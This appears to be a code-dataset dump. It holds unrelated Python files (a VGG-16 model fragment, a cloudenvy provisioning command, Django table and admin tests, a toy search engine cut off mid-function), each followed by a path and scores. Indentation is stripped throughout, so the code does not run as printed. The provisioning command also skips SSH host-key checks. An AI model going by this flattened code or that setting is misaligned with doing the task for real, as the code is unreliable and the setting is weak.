conv_15 = convolution_2d(input_tensor=conv_14, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_16 = convolution_2d(input_tensor=conv_15, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_17 = convolution_2d(input_tensor=conv_16, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_18 = max_pool_2d(input_tensor=conv_17, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
if num_block==1:
vgg_16 = conv_3
elif num_block==2:
vgg_16 = conv_6
elif num_block==3:
vgg_16 = conv_10
elif num_block==4:
vgg_16 = conv_14
elif num_block==5:
vgg_16 = conv_18
else:
vgg_16 = conv_18
return vgg_16
def create_model(self):
number_filter = self.input_tensor.get_shape().as_list()[-1]
vgg_base = self.vgg_block(input_tensor=self.input_tensor, num_block=self.num_block, batch_normalization=self.batch_normalization)
base_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [vgg_base]):
if self.num_depthwise_layer!=None or self.num_depthwise_layer>0:
for j in range(0,self.num_depthwise_layer):
##### FIX THIS TOMORROW
vgg_base = depthwise_convolution_2d(input_tensor=vgg_base, number_filters=number_filter, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', dropout_rates=None, names=None)
else:
flatten_layer = flatten(input_tensor=vgg_base, names='flatten')
for i in range(0, self.num_dense_layer):
vgg_base = dense(input_tensor=flatten_layer, hidden_units=self.num_hidden_unit, activations=self.activation_dense, regularizers=self.regularizer, scale=self.dropout_rate)
last_layer = flatten(input_tensor=vgg_base, names='flatten')
full_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
non_logit = dense(input_tensor=last_layer, hidden_units=self.classes, names='output')
if self.classes > 2:
output = softmax(input_tensor=non_logit, names='output')
else:
output = sigmoid(input_tensor=non_logit, names='output')
return non_logit, output, base_var_list, full_var_list | 0.867934 | 0.52902 |
import logging
import os
import time
import fabric.api
import fabric.operations
import cloudenvy.core
class Provision(cloudenvy.core.Command):
def _build_subparser(self, subparsers):
help_str = 'Upload and execute script(s) in your Envy.'
subparser = subparsers.add_parser('provision', help=help_str,
description=help_str)
subparser.set_defaults(func=self.run)
subparser.add_argument('-n', '--name', action='store', default='',
help='Specify custom name for an Envy.')
subparser.add_argument('-s', '--scripts', nargs='*', metavar='PATH',
help='Specify one or more scripts.')
return subparser
def run(self, config, args):
envy = cloudenvy.core.Envy(config)
logging.info('Running provision scripts for Envy \'%s\'.' %
envy.name)
if not envy.ip():
logging.error('Could not determine IP.')
return
with fabric.api.settings(
host_string=envy.ip(), user=envy.config.remote_user,
forward_agent=True, disable_known_hosts=True):
if args.scripts:
scripts = [os.path.expanduser(script) for
script in args.scripts]
elif 'provision_scripts' in envy.config.project_config:
scripts = [os.path.expanduser(script) for script in
envy.config.project_config['provision_scripts']]
elif 'provision_script_path' in envy.config.project_config:
provision_script = envy.config.project_config['provision_script_path']
scripts = [os.path.expanduser(provision_script)]
else:
raise SystemExit('Please specify the path to your provision '
'script(s) by either using the `--scripts` '
'flag, or by defining the `provision_scripts`'
' config option in your Envyfile.')
for script in scripts:
logging.info('Running provision script from \'%s\'', script)
for i in range(24):
try:
path = script
filename = os.path.basename(script)
remote_path = '~/%s' % filename
fabric.operations.put(path, remote_path, mode=0755)
fabric.operations.run(remote_path)
break
except fabric.exceptions.NetworkError:
logging.debug(
'Unable to upload the provision script '
'from `%s`. Trying again in 10 seconds.' % path
)
time.sleep(10)
logging.info('Provision script \'%s\' finished.' % path) | cloudenvy/commands/provision.py | import logging
import os
import time
import fabric.api
import fabric.operations
import cloudenvy.core
class Provision(cloudenvy.core.Command):
def _build_subparser(self, subparsers):
help_str = 'Upload and execute script(s) in your Envy.'
subparser = subparsers.add_parser('provision', help=help_str,
description=help_str)
subparser.set_defaults(func=self.run)
subparser.add_argument('-n', '--name', action='store', default='',
help='Specify custom name for an Envy.')
subparser.add_argument('-s', '--scripts', nargs='*', metavar='PATH',
help='Specify one or more scripts.')
return subparser
def run(self, config, args):
envy = cloudenvy.core.Envy(config)
logging.info('Running provision scripts for Envy \'%s\'.' %
envy.name)
if not envy.ip():
logging.error('Could not determine IP.')
return
with fabric.api.settings(
host_string=envy.ip(), user=envy.config.remote_user,
forward_agent=True, disable_known_hosts=True):
if args.scripts:
scripts = [os.path.expanduser(script) for
script in args.scripts]
elif 'provision_scripts' in envy.config.project_config:
scripts = [os.path.expanduser(script) for script in
envy.config.project_config['provision_scripts']]
elif 'provision_script_path' in envy.config.project_config:
provision_script = envy.config.project_config['provision_script_path']
scripts = [os.path.expanduser(provision_script)]
else:
raise SystemExit('Please specify the path to your provision '
'script(s) by either using the `--scripts` '
'flag, or by defining the `provision_scripts`'
' config option in your Envyfile.')
for script in scripts:
logging.info('Running provision script from \'%s\'', script)
for i in range(24):
try:
path = script
filename = os.path.basename(script)
remote_path = '~/%s' % filename
fabric.operations.put(path, remote_path, mode=0755)
fabric.operations.run(remote_path)
break
except fabric.exceptions.NetworkError:
logging.debug(
'Unable to upload the provision script '
'from `%s`. Trying again in 10 seconds.' % path
)
time.sleep(10)
logging.info('Provision script \'%s\' finished.' % path) | 0.279238 | 0.06148 |
from django.http import HttpRequest, QueryDict
from djtables.table import Table
from djtables.column import Column
DATA = [
{'name': "Leonardo", 'weapon': "Katana" },
{'name': "Michelangelo", 'weapon': "Nunchaku"},
{'name': "Donatello", 'weapon': "Bo Staff"},
{'name': "Raphael", 'weapon': "Sai" }]
class TestTable(Table):
name = Column()
weapon = Column()
def test_kwargs_override_options():
m = TestTable._meta.__dict__
t1 = TestTable(per_page=1)
t2 = TestTable(per_page=2)
assert t1._meta.per_page == 1
assert t2._meta.per_page == 2
# check that the class meta hasn't been touched.
assert TestTable._meta.__dict__ == m
def test_request_override_options():
req = HttpRequest()
req.GET = QueryDict(
"order_by=name&per_page=3",
encoding="utf-8")
t = TestTable(request=req)
assert t._meta.order_by == "name"
assert t._meta.per_page == 3
def test_class_exposes_columns_via_meta():
c = TestTable._meta.columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_instance_exposes_columns():
c = TestTable().columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_has_paginator():
t = TestTable(DATA)
p = t.paginator
# p must quack like a django paginator, so check for some common
# methods to ensure that it's actually a paginator returned.
assert p.count == len(DATA)
assert p.num_pages == 1
def test_returns_object_list():
t = TestTable(DATA)
d = t.object_list
assert d == DATA
def test_sorts_sortable_object_list():
class MockData(object):
def order_by(self, column):
return 111
t = TestTable(MockData(), order_by="name")
assert t.object_list == 111
def test_returns_rows():
class MockRow(object):
def __init__(self, table, obj):
self.table = table
self.obj = obj
t = TestTable(DATA, row_class=MockRow)
for n in range(len(DATA)):
assert isinstance(t.rows[n], MockRow)
assert t.rows[n].obj == DATA[n]
def test_returns_rows_on_active_page():
t = TestTable(DATA, per_page=2)
assert len(t.rows) == 2
def test_spawns_cells():
class MockCell(object):
def __init__(self, column, row):
self.column = column
self.row = row
t = TestTable(DATA, cell_class=MockCell)
c = t.cell(111, 222)
assert c.column == 111
assert c.row == 222
def test_accepts_prefix():
t = TestTable(prefix="a")
assert t._meta.prefix == "a"
def test_builds_urls():
req = HttpRequest()
req.GET = QueryDict("a=1", encoding="utf-8")
req.path = "/"
t = TestTable(request=req)
assert t.get_url() == "/?a=1"
assert t.get_url(a=2) == "/?a=2"
# either is valid, since param order is undefined.
assert t.get_url(b=3) in ["/?a=1&b=3", "/?b=3&a=1"] | tests/test_table.py |
from django.http import HttpRequest, QueryDict
from djtables.table import Table
from djtables.column import Column
DATA = [
{'name': "Leonardo", 'weapon': "Katana" },
{'name': "Michelangelo", 'weapon': "Nunchaku"},
{'name': "Donatello", 'weapon': "Bo Staff"},
{'name': "Raphael", 'weapon': "Sai" }]
class TestTable(Table):
name = Column()
weapon = Column()
def test_kwargs_override_options():
m = TestTable._meta.__dict__
t1 = TestTable(per_page=1)
t2 = TestTable(per_page=2)
assert t1._meta.per_page == 1
assert t2._meta.per_page == 2
# check that the class meta hasn't been touched.
assert TestTable._meta.__dict__ == m
def test_request_override_options():
req = HttpRequest()
req.GET = QueryDict(
"order_by=name&per_page=3",
encoding="utf-8")
t = TestTable(request=req)
assert t._meta.order_by == "name"
assert t._meta.per_page == 3
def test_class_exposes_columns_via_meta():
c = TestTable._meta.columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_instance_exposes_columns():
c = TestTable().columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_has_paginator():
t = TestTable(DATA)
p = t.paginator
# p must quack like a django paginator, so check for some common
# methods to ensure that it's actually a paginator returned.
assert p.count == len(DATA)
assert p.num_pages == 1
def test_returns_object_list():
t = TestTable(DATA)
d = t.object_list
assert d == DATA
def test_sorts_sortable_object_list():
class MockData(object):
def order_by(self, column):
return 111
t = TestTable(MockData(), order_by="name")
assert t.object_list == 111
def test_returns_rows():
class MockRow(object):
def __init__(self, table, obj):
self.table = table
self.obj = obj
t = TestTable(DATA, row_class=MockRow)
for n in range(len(DATA)):
assert isinstance(t.rows[n], MockRow)
assert t.rows[n].obj == DATA[n]
def test_returns_rows_on_active_page():
t = TestTable(DATA, per_page=2)
assert len(t.rows) == 2
def test_spawns_cells():
class MockCell(object):
def __init__(self, column, row):
self.column = column
self.row = row
t = TestTable(DATA, cell_class=MockCell)
c = t.cell(111, 222)
assert c.column == 111
assert c.row == 222
def test_accepts_prefix():
t = TestTable(prefix="a")
assert t._meta.prefix == "a"
def test_builds_urls():
req = HttpRequest()
req.GET = QueryDict("a=1", encoding="utf-8")
req.path = "/"
t = TestTable(request=req)
assert t.get_url() == "/?a=1"
assert t.get_url(a=2) == "/?a=2"
# either is valid, since param order is undefined.
assert t.get_url(b=3) in ["/?a=1&b=3", "/?b=3&a=1"] | 0.610453 | 0.439928 |
from __future__ import unicode_literals
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from powerpages.models import Page
from powerpages.sync import PageFileDumper
from powerpages.admin import website_link, sync_status, save_page
from powerpages.signals import page_edited
from .test_sync import BaseSyncTestCase
class WebsiteLinkTestCase(TestCase):
maxDiff = None
def test_no_object(self):
self.assertIsNone(website_link(None))
def test_empty_url(self):
self.assertEqual(
website_link(Page(url='')),
'<a href="" style="font-weight: normal;"> »</a>'
)
def test_root_url(self):
self.assertEqual(
website_link(Page(url='/')),
'<a href="/" style="font-weight: normal;">/ »</a>'
)
def test_first_level_url(self):
self.assertEqual(
website_link(Page(url='/test/')),
'<a href="/test/" style="font-weight: normal;">'
'/<span style="font-weight: bold">test</span>/'
' »</a>'
)
def test_second_level_url(self):
self.assertEqual(
website_link(Page(url='/nested/test/')),
'<a href="/nested/test/" style="font-weight: normal;">'
'/nested/<span style="font-weight: bold">test</span>/'
' »</a>'
)
def test_file(self):
self.assertEqual(
website_link(Page(url='/robots.txt')),
'<a href="/robots.txt" style="font-weight: normal;">'
'/<span style="font-weight: bold">robots.txt</span>'
' »</a>'
)
def test_nested_file(self):
self.assertEqual(
website_link(Page(url='/nested/robots.txt')),
'<a href="/nested/robots.txt" style="font-weight: normal;">'
'/nested/<span style="font-weight: bold">robots.txt</span>'
' »</a>'
)
class SyncStatusTestCase(BaseSyncTestCase):
maxDiff = None
def test_no_object(self):
self.assertIsNone(sync_status(None))
def test_file_synced(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
self.assertEqual(
sync_status(page),
'<span style="color: green">File is synced</span>'
)
def test_file_content_differs(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
page.title = '<NAME>'
page.save()
self.assertEqual(
sync_status(page),
'<span style="color: orange">File content differs</span>'
)
def test_file_is_missing(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
self.assertEqual(
sync_status(page),
'<span style="color: red">File is missing</span>'
)
def test_file_content_differs_modified_in_admin(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
page.title = '<NAME>'
page.is_dirty = True # modified in Admin
page.save()
self.assertEqual(
sync_status(page),
'<span style="color:black; font-weight:bold">'
'Changed in Admin!</span><br>'
'<span style="color: orange">File content differs</span>'
)
class SavePageTestCase(TestCase):
maxDiff = None
def setUp(self):
def page_edited_test_handler(sender, **kwargs):
self.page_edited_kwargs = kwargs
self.page_edited_kwargs = None
page_edited.connect(
page_edited_test_handler, dispatch_uid='test_page_edited',
weak=False
)
def tearDown(self):
page_edited.disconnect(dispatch_uid='test_page_edited')
self.page_edited_kwargs = None
def test_create_page(self):
page = Page(url='/test-page/')
user = User.objects.create_user('admin-user')
save_page(page=page, user=user, created=True)
self.assertIsNotNone(page.pk)
self.assertTrue(page.is_dirty)
self.assertDictContainsSubset(
{'page': page, 'user': user, 'created': True},
self.page_edited_kwargs
)
def test_modify_page(self):
page = Page.objects.create(url='/test-page/', title='Lorem')
page.title = 'Ipsum'
user = User.objects.create_user('admin-user')
save_page(page=page, user=user, created=False)
self.assertEqual(Page.objects.get(pk=page.pk).title, 'Ipsum')
self.assertTrue(page.is_dirty)
self.assertDictContainsSubset(
{'page': page, 'user': user, 'created': False},
self.page_edited_kwargs
)
class SwitchEditModeViewTestCase(TestCase):
maxDiff = None
def setUp(self):
self.url = reverse('switch_edit_mode')
self.staff_member = User.objects.create_user(
'staff_member', password='<PASSWORD>', is_staff=True
)
self.super_user = User.objects.create_user(
'super_user', password='<PASSWORD>', is_superuser=True
)
self.regular_user = User.objects.create_user(
'regular_user', password='<PASSWORD>'
)
Page.objects.create(url='/')
Page.objects.create(url='/test-page/')
def test_enable_edit_mode_staff_member_referrer(self):
self.client.login(username='staff_member', password='<PASSWORD>')
response = self.client.get(self.url, HTTP_REFERER='/test-page/')
self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
self.assertRedirects(response, '/test-page/')
def test_disable_edit_mode_staff_member_no_referrer(self):
self.client.login(username='staff_member', password='<PASSWORD>')
session = self.client.session
session['WEBSITE_EDIT_MODE'] = True
session.save()
response = self.client.get(self.url)
self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
self.assertRedirects(response, '/')
def test_enable_edit_mode_super_user_no_referrer(self):
self.client.login(username='super_user', password='<PASSWORD>')
response = self.client.get(self.url)
self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
self.assertRedirects(response, '/')
def test_disable_edit_mode_super_user_referrer(self):
self.client.login(username='super_user', password='<PASSWORD>')
session = self.client.session
session['WEBSITE_EDIT_MODE'] = True
session.save()
response = self.client.get(self.url, HTTP_REFERER='/test-page/')
self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
self.assertRedirects(response, '/test-page/')
def test_access_forbidden_regular_user(self):
self.client.login(username='regular_user', password='<PASSWORD>')
response = self.client.get(self.url)
self.assertRedirects(
response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
fetch_redirect_response=False
)
def test_access_forbidden_anonmous(self):
response = self.client.get(self.url)
self.assertRedirects(
response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
fetch_redirect_response=False
) | powerpages/tests/test_admin.py |
from __future__ import unicode_literals
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from powerpages.models import Page
from powerpages.sync import PageFileDumper
from powerpages.admin import website_link, sync_status, save_page
from powerpages.signals import page_edited
from .test_sync import BaseSyncTestCase
class WebsiteLinkTestCase(TestCase):
maxDiff = None
def test_no_object(self):
self.assertIsNone(website_link(None))
def test_empty_url(self):
self.assertEqual(
website_link(Page(url='')),
'<a href="" style="font-weight: normal;"> »</a>'
)
def test_root_url(self):
self.assertEqual(
website_link(Page(url='/')),
'<a href="/" style="font-weight: normal;">/ »</a>'
)
def test_first_level_url(self):
self.assertEqual(
website_link(Page(url='/test/')),
'<a href="/test/" style="font-weight: normal;">'
'/<span style="font-weight: bold">test</span>/'
' »</a>'
)
def test_second_level_url(self):
self.assertEqual(
website_link(Page(url='/nested/test/')),
'<a href="/nested/test/" style="font-weight: normal;">'
'/nested/<span style="font-weight: bold">test</span>/'
' »</a>'
)
def test_file(self):
self.assertEqual(
website_link(Page(url='/robots.txt')),
'<a href="/robots.txt" style="font-weight: normal;">'
'/<span style="font-weight: bold">robots.txt</span>'
' »</a>'
)
def test_nested_file(self):
self.assertEqual(
website_link(Page(url='/nested/robots.txt')),
'<a href="/nested/robots.txt" style="font-weight: normal;">'
'/nested/<span style="font-weight: bold">robots.txt</span>'
' »</a>'
)
class SyncStatusTestCase(BaseSyncTestCase):
maxDiff = None
def test_no_object(self):
self.assertIsNone(sync_status(None))
def test_file_synced(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
self.assertEqual(
sync_status(page),
'<span style="color: green">File is synced</span>'
)
def test_file_content_differs(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
page.title = '<NAME>'
page.save()
self.assertEqual(
sync_status(page),
'<span style="color: orange">File content differs</span>'
)
def test_file_is_missing(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
self.assertEqual(
sync_status(page),
'<span style="color: red">File is missing</span>'
)
def test_file_content_differs_modified_in_admin(self):
page = Page.objects.create(
url='/test-page/', template='<h1>Test Page</h1>'
)
PageFileDumper(page).save()
page.title = '<NAME>'
page.is_dirty = True # modified in Admin
page.save()
self.assertEqual(
sync_status(page),
'<span style="color:black; font-weight:bold">'
'Changed in Admin!</span><br>'
'<span style="color: orange">File content differs</span>'
)
class SavePageTestCase(TestCase):
maxDiff = None
def setUp(self):
def page_edited_test_handler(sender, **kwargs):
self.page_edited_kwargs = kwargs
self.page_edited_kwargs = None
page_edited.connect(
page_edited_test_handler, dispatch_uid='test_page_edited',
weak=False
)
def tearDown(self):
page_edited.disconnect(dispatch_uid='test_page_edited')
self.page_edited_kwargs = None
def test_create_page(self):
page = Page(url='/test-page/')
user = User.objects.create_user('admin-user')
save_page(page=page, user=user, created=True)
self.assertIsNotNone(page.pk)
self.assertTrue(page.is_dirty)
self.assertDictContainsSubset(
{'page': page, 'user': user, 'created': True},
self.page_edited_kwargs
)
def test_modify_page(self):
page = Page.objects.create(url='/test-page/', title='Lorem')
page.title = 'Ipsum'
user = User.objects.create_user('admin-user')
save_page(page=page, user=user, created=False)
self.assertEqual(Page.objects.get(pk=page.pk).title, 'Ipsum')
self.assertTrue(page.is_dirty)
self.assertDictContainsSubset(
{'page': page, 'user': user, 'created': False},
self.page_edited_kwargs
)
class SwitchEditModeViewTestCase(TestCase):
maxDiff = None
def setUp(self):
self.url = reverse('switch_edit_mode')
self.staff_member = User.objects.create_user(
'staff_member', password='<PASSWORD>', is_staff=True
)
self.super_user = User.objects.create_user(
'super_user', password='<PASSWORD>', is_superuser=True
)
self.regular_user = User.objects.create_user(
'regular_user', password='<PASSWORD>'
)
Page.objects.create(url='/')
Page.objects.create(url='/test-page/')
def test_enable_edit_mode_staff_member_referrer(self):
self.client.login(username='staff_member', password='<PASSWORD>')
response = self.client.get(self.url, HTTP_REFERER='/test-page/')
self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
self.assertRedirects(response, '/test-page/')
def test_disable_edit_mode_staff_member_no_referrer(self):
self.client.login(username='staff_member', password='<PASSWORD>')
session = self.client.session
session['WEBSITE_EDIT_MODE'] = True
session.save()
response = self.client.get(self.url)
self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
self.assertRedirects(response, '/')
def test_enable_edit_mode_super_user_no_referrer(self):
self.client.login(username='super_user', password='<PASSWORD>')
response = self.client.get(self.url)
self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
self.assertRedirects(response, '/')
def test_disable_edit_mode_super_user_referrer(self):
self.client.login(username='super_user', password='<PASSWORD>')
session = self.client.session
session['WEBSITE_EDIT_MODE'] = True
session.save()
response = self.client.get(self.url, HTTP_REFERER='/test-page/')
self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
self.assertRedirects(response, '/test-page/')
def test_access_forbidden_regular_user(self):
self.client.login(username='regular_user', password='<PASSWORD>')
response = self.client.get(self.url)
self.assertRedirects(
response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
fetch_redirect_response=False
)
def test_access_forbidden_anonmous(self):
response = self.client.get(self.url)
self.assertRedirects(
response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
fetch_redirect_response=False
) | 0.521227 | 0.306947 |
from typing import List, Set, Dict, Tuple
import csv
import os
import json
import time
import datetime
Table = List[str]
Index = Dict[str, List[int]]
Fuzzy = Dict[str, List[str]]
ROOT_PATH = "C:/Arcology/AeonDB"
TABLE_DIR = "C:/Arcology/AeonDB/%s"
TABLE_PATH = "C:/Arcology/AeonDB/%s/table.txt"
INDEX_PATH = "C:/Arcology/AeonDB/%s/index.txt"
FUZZY_PATH = "C:/Arcology/AeonDB/%s/fuzzy.txt"
FUZZY2_PATH = "C:/Arcology/AeonDB/%s/fuzzy2.txt"
g_tables: Dict[str, Table] = dict()
g_indices: Dict[str, Index] = dict()
g_fuzzyDict: Dict[str, Fuzzy] = dict()
g_fuzzyDict2: Dict[str, Fuzzy] = dict()
def readTable(tableName: str) -> Table:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(TABLE_PATH % tableName))
def writeTable(tableName: str, table: Table) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(table, open(TABLE_PATH % tableName, 'w+'))
return None
def readIndex(tableName: str) -> Index:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(INDEX_PATH % tableName))
def writeIndex(tableName: str, index: Index) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(index, open(INDEX_PATH % tableName, 'w+'))
return None
def readFuzzy(tableName: str) -> Fuzzy:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(FUZZY_PATH % tableName))
def writeFuzzy(tableName: str, fuzzy: Fuzzy) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(fuzzy, open(FUZZY_PATH % tableName, 'w+'))
return None
def readFuzzy2(tableName: str) -> Fuzzy:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(FUZZY2_PATH % tableName))
def writeFuzzy2(tableName: str, fuzzy: Fuzzy) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(fuzzy, open(FUZZY2_PATH % tableName, 'w+'))
return None
def listTables() -> List[str]:
os.makedirs(ROOT_PATH, exist_ok=True)
return os.listdir(ROOT_PATH)
def timestamp() -> str:
return datetime.datetime.fromtimestamp(time.time()).strftime("%m/%d/%Y %H:%M:%S")
g_cmdHelpMap = {
"createtable" : "createTable {tableDesc}",
"getrows" : "getRows {tableName} {key} {count}",
"importtable" : "importTable {tableName} {CSV filespec}",
"listtables" : "listTables",
"indextable" : "indexTable {tableName}",
"find" : "find {tableName} {term1 term2 term3...}",
"fuzzysearch" : "fuzzySearch {tableName} {term1 term2 term3...}",
"quit" : "quit"
}
def printHelp() -> None:
for help in g_cmdHelpMap.values():
print(help)
return
def toBigrams(s: str) -> Set[str]:
ngrams = set()
if len(s) < 2:
ngrams.add(s)
return ngrams
for i in range(len(s) - 1):
ngrams.add(s[i:i+2])
return ngrams
def dicesCoefficient(a: Set[str], b: Set[str]) -> float:
return float(2 * len(a.intersection(b))) / float(len(a) + len(b))
def preprocess(s: str) -> str:
s = s.replace("~", " ")
s = s.replace("`", " ")
s = s.replace("!", " ")
s = s.replace("@", " ")
s = s.replace("#", " ")
s = s.replace("$", " ")
s = s.replace("%", " ")
s = s.replace("^", " ")
s = s.replace("&", " ")
s = s.replace("*", " ")
s = s.replace("(", " ")
s = s.replace(")", " ")
s = s.replace("-", " ")
s = s.replace("_", " ")
s = s.replace("+", " ")
s = s.replace("=", " ")
s = s.replace("{", " ")
s = s.replace("}", " ")
s = s.replace("[", " ")
s = s.replace("]", " ")
s = s.replace("|", " ")
s = s.replace("\\", " ")
s = s.replace(";", " ")
s = s.replace(":", " ")
s = s.replace('"', " ")
s = s.replace("'", " ")
s = s.replace("<", " ")
s = s.replace(">", " ")
s = s.replace(",", " ")
s = s.replace(".", " ")
s = s.replace("/", " ")
s = s.replace("?", " ")
s = s.replace("1", " ")
s = s.replace("2", " ")
s = s.replace("3", " ")
s = s.replace("4", " ")
s = s.replace("5", " ")
s = s.replace("6", " ")
s = s.replace("7", " ")
s = s.replace("8", " ")
s = s.replace("9", " ")
s = s.replace("0", " ")
return s
def createIndex(table: Table) -> Tuple[Index, Fuzzy, Fuzzy]:
startTime = time.time()
index: Index = dict()
fuzzy1: Fuzzy = dict()
fuzzy2: Fuzzy = dict()
fuzzy3: Dict[str, Set[str]] = dict()
for rowId in range(len(table)):
row = table[rowId]
row = preprocess(row).lower()
terms = set(row.split())
if "" in terms:
terms.remove("")
for term in terms:
if term not in index:
index.update({term: list()})
rowIds = index.get(term)
if rowId not in rowIds:
rowIds.append(rowId)
if term not in fuzzy3:
atLeastOneBigram = set()
bigrams = toBigrams(term)
fuzzy3.update({term: bigrams})
for bigram in bigrams:
if bigram not in fuzzy2:
fuzzy2.update({bigram: list()})
bigramList = fuzzy2.get(bigram)
bigramList.append(term)
atLeastOneBigram.update(bigramList)
related = list()
for term2 in atLeastOneBigram:
if term == term2:
related.append(term2)
elif dicesCoefficient(fuzzy3.get(term), fuzzy3.get(term2)) > 0.6:
related.append(term2)
fuzzy1.get(term2).append(term)
fuzzy1.update({term: related})
print("Indexed row %d of %d." % (rowId, len(table)))
print("Indexing Time: " + str(time.time() - startTime))
return index, fuzzy1, fuzzy2
def importCsv(filename: str) -> Table:
table = [" ".join(row) for row in csv.reader(open(filename))]
table.pop(0)
return table
def expandQuery(term: str, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy) -> Set[int]:
rowIds = set()
relateds = set()
if term not in fuzzy:
possiblyRelateds = set()
bigrams = toBigrams(term)
for bigram in bigrams:
if bigram in fuzzy2:
possiblyRelateds.update(fuzzy2.get(bigram))
for pRelated in possiblyRelateds:
if dicesCoefficient(toBigrams(pRelated), bigrams) > 0.6:
relateds.add(pRelated)
else:
relateds = fuzzy.get(term)
for related in relateds:
rowIds.update(index.get(related))
return rowIds
def find(keyTerms: Set[str], table: Table, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy, isFuzzy: bool) -> Table:
lowKeyTerms = {term.lower() for term in keyTerms}
rowIds = set()
results = list()
first = lowKeyTerms.pop()
if isFuzzy:
rowIds.update(expandQuery(first, index, fuzzy, fuzzy2))
elif first in index:
rowIds.update(index.get(first))
else:
return results
for word in lowKeyTerms:
if isFuzzy:
rowIds.intersection_update(expandQuery(word, index, fuzzy, fuzzy2))
elif word in index:
rowIds.intersection_update(index.get(word))
else:
return results
for i in rowIds:
results.append(table[i])
return results
def loadAllTables() -> None:
tableNames = listTables()
for tableName in tableNames:
print("%s Log.info: Table %s: Backup volume offline. Waiting for new volume." % (timestamp(), tableName))
try:
table = readTable(tableName)
g_tables.update({tableName: table})
print("%s Log.info: Table %s: Recovered %d rows." % (timestamp(), tableName, len(table)))
except OSError:
print("%s Log.info: Table %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Table %s: File is corrupted." % (timestamp(), tableName))
try:
index = readIndex(tableName)
g_indices.update({tableName: index})
print("%s Log.info: Index %s: Recovered %d terms." % (timestamp(), tableName, len(index)))
except OSError:
print("%s Log.info: Index %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Index %s: File is corrupted." % (timestamp(), tableName))
try:
fuzzy = readFuzzy(tableName)
g_fuzzyDict.update({tableName: fuzzy})
print("%s Log.info: Fuzzy %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy)))
except OSError:
print("%s Log.info: Fuzzy %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Fuzzy %s: File is corrupted." % (timestamp(), tableName))
try:
fuzzy2 = readFuzzy2(tableName)
g_fuzzyDict2.update({tableName: fuzzy2})
print("%s Log.info: Fuzzy2 %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy2)))
except OSError:
print("%s Log.info: Fuzzy2 %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Fuzzy2 %s: File is corrupted." % (timestamp(), tableName))
print("AeonDB ready. %d tables available." % len(tableNames))
return None
def prompt() -> List[str]:
args = input(" : ").split()
args[0] = args[0].lower()
return args
def main() -> None:
print("%s AeonDB 1.0 beta 65" % timestamp())
print(u"%s Copyright © 2011-2018 by Kronosaur Productions LLC. All Rights Reserved." % timestamp())
loadAllTables()
args = prompt()
while args[0] != "quit":
# createtable
if args[0] == "createtable":
if len(args) < 2:
print(g_cmdHelpMap.get(args[0]))
else:
print("Not implemented for demo.")
# getrows
elif args[0] == "getrows":
if len(args) < 4:
print(g_cmdHelpMap.get(args[0]))
else:
print("Not implemented for demo.")
# importtable
elif args[0] == "importtable":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
csvName = args[2]
csvName = csvName.replace('"', "")
csvName = csvName.replace("'", "")
csvName = csvName.replace("/", "\\")
try:
